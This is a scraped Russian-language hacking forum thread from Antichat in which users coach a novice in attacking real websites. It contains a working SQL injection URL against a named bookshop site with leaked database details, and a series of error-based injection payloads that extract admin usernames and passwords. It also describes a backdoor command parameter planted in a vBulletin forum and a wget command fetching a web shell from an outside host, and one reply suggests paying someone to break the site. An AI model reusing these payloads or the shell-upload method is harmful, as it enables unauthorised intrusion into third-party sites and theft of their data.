Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
27.04.2010, 14:20
|
|
Познающий
Регистрация: 08.04.2010
Сообщений: 34
Провел на форуме:
277809
Репутация:
1
|
|
Что значит эта ошибка?
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/kniga-market/kniga-market.kiev.ua/about.php on line 7
|
|
|
27.04.2010, 14:45
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от ExQ
Что значит эта ошибка?
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/kniga-market/kniga-market.kiev.ua/about.php on line 7
то что ты ковычку зафигачил в параметр =)) Возможно есть sql inj. ты покажи запрос который ты отправляешь. Если это выдаёт просто скрипт без параметров, то скорее всего он просто криво написан.
|
|
|
|
27.04.2010, 14:49
|
|
Познающий
Регистрация: 08.04.2010
Сообщений: 34
Провел на форуме:
277809
Репутация:
1
|
|
Сообщение от kfor
то что ты ковычку зафигачил в параметр =)) Возможно есть sql inj. ты покажи запрос который ты отправляешь. Если это выдаёт просто скрипт без параметров, то скорее всего он просто криво написан.
http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+1+from+тут название таблички --
|
|
|
|
27.04.2010, 14:50
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
А пройти по указанному линку никак, не?
http://kniga-market.kiev.ua/about.php - просто бага
http://kniga-market.kiev.ua/producers.php?category=10' - скуля
Код:
http://kniga-market.kiev.ua/producers.php?category=10+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4+--
u_knigamarke@localhost:4.1.22-log:knigamarket |
|
|
|
27.04.2010, 14:54
|
|
Познающий
Регистрация: 08.04.2010
Сообщений: 34
Провел на форуме:
277809
Репутация:
1
|
|
Сообщение от wildshaman
А пройти по указанному линку никак, не?
http://kniga-market.kiev.ua/about.php - просто бага
http://kniga-market.kiev.ua/producers.php?category=10' - скуля
Код:
http://kniga-market.kiev.ua/producers.php?category=10+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4+--
u_knigamarke@localhost:4.1.22-log:knigamarket
Ссори.. сильно не пинайте)
совсем ламер в этих делах 
Ну а что делать дальше? 
Последний раз редактировалось ExQ; 27.04.2010 в 14:59..
|
|
|
|
27.04.2010, 15:10
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от ExQ
Ну а что делать дальше? Читать форум, статей куча, и не флудить в теме.
Если читать не умеешь, а сайт нужен, дать денег кому-нить, кто сломает. Всё просто
|
|
|
|
27.04.2010, 16:27
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Тема с выводом инфы через ошибки такая забавная.
Раз:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,user(),version())+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
PHP код:
Error 1062: Duplicate entry 'user@siteserv:5.1.29-rc-log1' for key 'group_key'
Два:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,user,password)+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
//WTF? Поле password точно есть.
Три:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+user+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
PHP код:
Error 1062: Duplicate entry 'admin1' for key 'group_key'
Четыре:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+password+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
//WTF
Пять:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+password+from+users+WHERE+user='admin'),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
//WTF
Шесть:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+substring(password,1,5)+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
PHP код:
Error 1062: Duplicate entry 'mypas1' for key 'group_key'
В итоге работает такой костыль:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(user,substring(password,1,300))+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
PHP код:
Error 1062: Duplicate entry 'admin:mypassword1' for key 'group_key'
И таки откуда такая проблема и как ее обойти? Substring - не выход, я считаю. |
|
|
|
27.04.2010, 17:01
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
27.04.2010, 17:44
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Qwazar
Оно.
Кстати, как показала практика, необязательно резать строку, достаточно ее просто прогнать через эти функции в стиле substr(column,1,350). Ограничение будет, но уже меньше. Причем число 350 получается как некая константа минус длина имен колонок в подзапросе(или вроде того). Надо дальше копать.
view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c,mid(val,1,490),0x7c7c)+from+settings+LIMIT+0,1),floor(rand(0)*3 ))+from+information_schema.tables+group+by+2+limit +1,1)a)
Cрабатывает.
view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c7c,mid(val,1,490),0x7c7c)+from+settings+LIMIT+0,1),floor(rand(0)*3 ))+from+information_schema.tables+group+by+2+limit +1,1)a)
Не срабатывает.
view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c7c,mid(val,1,489),0x7c7c)+from+settings+LIMIT+0,1),floor(rand(0)*3 ))+from+information_schema.tables+group+by+2+limit +1,1)a)
Срабатывает.
|
|
|
|
27.04.2010, 18:21
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Такой вопрос,
как залить шелл = \
vb 4.0.2
Есть доступ к админке, добавил модуль в faq_complete с содержимым
OC там Linux
Пишу в адресной строке:
http://forum.site.ru/faq.php?cmd=ls
Вижу файлы и папки корня)
Делаю такой запрос в адресной строке:
forum.site.ru/faq.php?cmd=wget www.sitesshelom.ru/shell.php
Долго думает ) и потом вылазит 404 not found, вообщем шелл не заливается = \
подскажите как залить еще можно = \ |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
